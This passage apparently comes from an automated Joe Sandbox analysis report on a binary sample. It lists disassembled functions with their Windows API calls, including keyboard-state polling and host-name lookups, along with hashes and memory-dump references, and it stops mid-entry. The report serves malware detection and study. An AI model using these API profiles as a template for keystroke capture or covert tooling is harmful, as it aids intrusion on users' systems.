                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                        • String ID: BUTTON
                                                                        • API String ID: 1194449130-3405671355
                                                                        • Opcode ID: 4bf695c97b2cfa48b5f1fe4439806e229a049e562a1b9c583303bfb4eaaef1f3
                                                                        • Instruction ID: 80d66eca4143cf55526db4579d4d8d5736f7d8f400f1cfcefe22838e1c7625da
                                                                        • Opcode Fuzzy Hash: 4bf695c97b2cfa48b5f1fe4439806e229a049e562a1b9c583303bfb4eaaef1f3
                                                                        • Instruction Fuzzy Hash: DA214FB0208209AFE7059B21EC89BB73F6BFB84769B005015F546B25B2DF759D08EB61
                                                                        Function 00EC02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • CoInitialize.OLE32(00000000), ref: 00EC034B
                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EC03DE
                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00EC03F2
                                                                        • CoCreateInstance.OLE32(00EFDA8C,00000000,00000001,00F23CF8,?), ref: 00EC043E
                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EC04AD
                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00EC0505
                                                                        • _memset.LIBCMT ref: 00EC0542
                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00EC057E
                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EC05A1
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00EC05A8
                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00EC05DF
                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00EC05E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                        • String ID:
                                                                        • API String ID: 1246142700-0
                                                                        • Opcode ID: 722d3014c36d3dd532e3a3a18d0a78decf69c5950f7e30c810e0b67e5882cdcf
                                                                        • Instruction ID: 0f1e3de778f7425953907c7c989cf34d51460e44c1d64240595deb6b3ea525ae
                                                                        • Opcode Fuzzy Hash: 722d3014c36d3dd532e3a3a18d0a78decf69c5950f7e30c810e0b67e5882cdcf
                                                                        • Instruction Fuzzy Hash: 35B1D975A00209AFDB14DFA4C988EAEBBF9FF88304B149459F909EB251D731ED45CB50
                                                                        Function 00EB2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00EB2ED6
                                                                        • SetKeyboardState.USER32(?), ref: 00EB2F41
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00EB2F61
                                                                        • GetKeyState.USER32(000000A0), ref: 00EB2F78
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00EB2FA7
                                                                        • GetKeyState.USER32(000000A1), ref: 00EB2FB8
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00EB2FE4
                                                                        • GetKeyState.USER32(00000011), ref: 00EB2FF2
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00EB301B
                                                                        • GetKeyState.USER32(00000012), ref: 00EB3029
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00EB3052
                                                                        • GetKeyState.USER32(0000005B), ref: 00EB3060
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 74a988d029487bcdbdcfcb11d16f7af9ba8e42d636887cb9ae880949c116597c
                                                                        • Instruction ID: 45498b1c5d8460ee0b17c5ec12a524c9a78a02ffe4e6de4053c86ded57572a03
                                                                        • Opcode Fuzzy Hash: 74a988d029487bcdbdcfcb11d16f7af9ba8e42d636887cb9ae880949c116597c
                                                                        • Instruction Fuzzy Hash: B351CB60A0878429FB36EBB488517EBBFF45F11348F08559DD6C27A1C3DA549B4CC7A2
                                                                        Function 00EAED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000001), ref: 00EAED1E
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00EAED30
                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EAED8E
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00EAED99
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00EAEDAB
                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EAEE01
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00EAEE0F
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00EAEE20
                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EAEE63
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00EAEE71
                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EAEE8E
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00EAEE9B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                        • String ID:
                                                                        • API String ID: 3096461208-0
                                                                        • Opcode ID: 3752533d4c84de326b7d578d1bcbec7ed9b0710ecc1bc415e5ad3c9a0126eb97
                                                                        • Instruction ID: 3e5dd8a17882cc5708b2aa63d86bc8e327bb95d2384ec6a98f87ecd4007bc2fd
                                                                        • Opcode Fuzzy Hash: 3752533d4c84de326b7d578d1bcbec7ed9b0710ecc1bc415e5ad3c9a0126eb97
                                                                        • Instruction Fuzzy Hash: 3B512171B00205AFDB18CF69CD89AAEBBBAEB88304F158129F519E7290D770AD04CB10
                                                                        Function 00E8B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E8B759,?,00000000,?,?,?,?,00E8B72B,00000000,?), ref: 00E8BA58
                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E8B72B), ref: 00E8B7F6
                                                                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00E8B72B,00000000,?,?,00E8B2EF,?,?), ref: 00E8B88D
                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00EED8A6
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E8B72B,00000000,?,?,00E8B2EF,?,?), ref: 00EED8D7
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E8B72B,00000000,?,?,00E8B2EF,?,?), ref: 00EED8EE
                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E8B72B,00000000,?,?,00E8B2EF,?,?), ref: 00EED90A
                                                                        • DeleteObject.GDI32(00000000), ref: 00EED91C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 641708696-0
                                                                        • Opcode ID: 144f8ce0ff173d788a579bc654d146d1925718abce0f79cdf563f9813bfc73ad
                                                                        • Instruction ID: 975cd21b3cdc4bf72078ce4f9236e93af60e5a8842fb6433648ecc34f7b6cd8d
                                                                        • Opcode Fuzzy Hash: 144f8ce0ff173d788a579bc654d146d1925718abce0f79cdf563f9813bfc73ad
                                                                        • Instruction Fuzzy Hash: C061AD30504744CFDB29AF56DC89B75BBF6FB9432AF14251AE04EA6A70CB71A890DF40
                                                                        Function 00E8B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B526: GetWindowLongW.USER32(?,000000EB), ref: 00E8B537
                                                                        • GetSysColor.USER32(0000000F), ref: 00E8B438
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ColorLongWindow
                                                                        • String ID:
                                                                        • API String ID: 259745315-0
                                                                        • Opcode ID: 198747badb68c2eb358f57ea0174580cc6c0fd12f703c743a7c8147ecce7f606
                                                                        • Instruction ID: e92a3cca81e2e765d735bf72d7a5bda4c17bc606d3498e9dc1a1bdde4d18100b
                                                                        • Opcode Fuzzy Hash: 198747badb68c2eb358f57ea0174580cc6c0fd12f703c743a7c8147ecce7f606
                                                                        • Instruction Fuzzy Hash: 1541CF30005144AFDB206F29DC8ABB93B66AB46735F185261FD7DBE1E2E7308C42DB21
                                                                        Function 00EB690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                        • String ID:
                                                                        • API String ID: 136442275-0
                                                                        • Opcode ID: 4acd2cd71df3751219b85893f29bd274d274088e509a9e7e7bdcfbb52339aa5e
                                                                        • Instruction ID: 4a5571553f9bcc0c216258ea057607519bea1ef3badaa7a3ff3f1420966dd079
                                                                        • Opcode Fuzzy Hash: 4acd2cd71df3751219b85893f29bd274d274088e509a9e7e7bdcfbb52339aa5e
                                                                        • Instruction Fuzzy Hash: 55410B7684511CAFCF61EB94CC85DDBB3BCEF44310F4051A6B659B2051EA34ABE98F50
                                                                        Function 00EBD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(00F0DC00,00F0DC00,00F0DC00), ref: 00EBD7CE
                                                                        • GetDriveTypeW.KERNEL32(?,00F23A70,00000061), ref: 00EBD898
                                                                        • _wcscpy.LIBCMT ref: 00EBD8C2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                        • API String ID: 2820617543-1000479233
                                                                        • Opcode ID: babec0e6f73be90b8c5444741a4a897162cc1dab29a5f8d618c09bcbbe20411f
                                                                        • Instruction ID: 0b70c3a12bbe637ac185878dff83a26f55d49027f2454d1b5561cb50d271dda2
                                                                        • Opcode Fuzzy Hash: babec0e6f73be90b8c5444741a4a897162cc1dab29a5f8d618c09bcbbe20411f
                                                                        • Instruction Fuzzy Hash: 1F517E35508240AFC714EF14DC82AABB7E5EF84318F20A82DF59D672A2EB71DD05DB42
                                                                        Function 00E7936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 00E793AB
                                                                        • __itow.LIBCMT ref: 00E793DF
                                                                          • Part of subcall function 00E91557: _xtow@16.LIBCMT ref: 00E91578
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __itow__swprintf_xtow@16
                                                                        • String ID: %.15g$0x%p$False$True
                                                                        • API String ID: 1502193981-2263619337
                                                                        • Opcode ID: d8fef573d2fefc2d19472527bb4e1f142e8feb2defa3ccb65e77041318ab27b5
                                                                        • Instruction ID: f7cb3f2da96976220cf59bb1d051fb41710e38dc8277b8e438ccc008fdb79003
                                                                        • Opcode Fuzzy Hash: d8fef573d2fefc2d19472527bb4e1f142e8feb2defa3ccb65e77041318ab27b5
                                                                        • Instruction Fuzzy Hash: 0B41D471504209ABEB24EB74D942EAAB3E8EF48304F3094AEE14DF71C2EA71D941DB51
                                                                        Function 00EDA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EDA259
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00EDA260
                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EDA273
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EDA27B
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EDA286
                                                                        • DeleteDC.GDI32(00000000), ref: 00EDA28F
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00EDA299
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EDA2AD
                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EDA2B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                        • String ID: static
                                                                        • API String ID: 2559357485-2160076837
                                                                        • Opcode ID: 449deb7ceebd4021a058f8ca2209e6035c45bbc2845b56fd718a2162b16a9aff
                                                                        • Instruction ID: 1a8e2b95aae35bb4328e809f54dca18a423200fa81a165d9c4f60deb3461980b
                                                                        • Opcode Fuzzy Hash: 449deb7ceebd4021a058f8ca2209e6035c45bbc2845b56fd718a2162b16a9aff
                                                                        • Instruction Fuzzy Hash: F431AC31101114AFDF115FA5DC49FEA3F6AFF49324F150225FA19B62A0C732D822DBA5
                                                                        Function 00EB6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                        • String ID: 0.0.0.0
                                                                        • API String ID: 2620052-3771769585
                                                                        • Opcode ID: 03be5e5b76c56b58736fb6ec2d6de32e7107f762af88cd91fdad11e6c0ff45ef
                                                                        • Instruction ID: 05857999e1c05ba7c50ad61af7aaa1bcb8685ef0e883d319252717fef1c1c98e
                                                                        • Opcode Fuzzy Hash: 03be5e5b76c56b58736fb6ec2d6de32e7107f762af88cd91fdad11e6c0ff45ef
                                                                        • Instruction Fuzzy Hash: 9811E472608114AFCB24BB65AC0AEFA7BACEF80714F011066F149B6081EF74DA85DB91
                                                                        Function 00E9500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00E95047
                                                                          • Part of subcall function 00E97C0E: __getptd_noexit.LIBCMT ref: 00E97C0E
                                                                        • __gmtime64_s.LIBCMT ref: 00E950E0
                                                                        • __gmtime64_s.LIBCMT ref: 00E95116
                                                                        • __gmtime64_s.LIBCMT ref: 00E95133
                                                                        • __allrem.LIBCMT ref: 00E95189
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E951A5
                                                                        • __allrem.LIBCMT ref: 00E951BC
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E951DA
                                                                        • __allrem.LIBCMT ref: 00E951F1
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E9520F
                                                                        • __invoke_watson.LIBCMT ref: 00E95280
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                        • String ID:
                                                                        • API String ID: 384356119-0
                                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                        • Instruction ID: 03bbcfcce8ad2fb17be52cda0297e51af2a8a042e4922b402989c9f3f55508ee
                                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                        • Instruction Fuzzy Hash: 8F71D773A01F16ABDF159F68CC41B5AB3F8AF45764F14522AF910FA681E770E94087D0
                                                                        Function 00EB4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB4DF8
                                                                        • GetMenuItemInfoW.USER32(00F31708,000000FF,00000000,00000030), ref: 00EB4E59
                                                                        • SetMenuItemInfoW.USER32(00F31708,00000004,00000000,00000030), ref: 00EB4E8F
                                                                        • Sleep.KERNEL32(000001F4), ref: 00EB4EA1
                                                                        • GetMenuItemCount.USER32(?), ref: 00EB4EE5
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00EB4F01
                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00EB4F2B
                                                                        • GetMenuItemID.USER32(?,?), ref: 00EB4F70
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EB4FB6
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB4FCA
                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB4FEB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                        • String ID:
                                                                        • API String ID: 4176008265-0
                                                                        • Opcode ID: eae01992e35d65abe85ca877e782a71273c6ea5c7bf3989e5c48d6147e839a45
                                                                        • Instruction ID: d0d434bf017babd3b157f1336dbc4491b2e94c52f0ffc1bab2d94b0d23df9ff6
                                                                        • Opcode Fuzzy Hash: eae01992e35d65abe85ca877e782a71273c6ea5c7bf3989e5c48d6147e839a45
                                                                        • Instruction Fuzzy Hash: 636159B1A04249AFDB21CFA4DC88AFF7BBABB45308F142059F441B7292D731AD45DB20
                                                                        Function 00ED9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00ED9C98
                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00ED9C9B
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00ED9CBF
                                                                        • _memset.LIBCMT ref: 00ED9CD0
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00ED9CE2
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00ED9D5A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 830647256-0
                                                                        • Opcode ID: 015de3f7f9dc43c5f97561f15320a01e2bb75f2f29957719d80f47292f6b453a
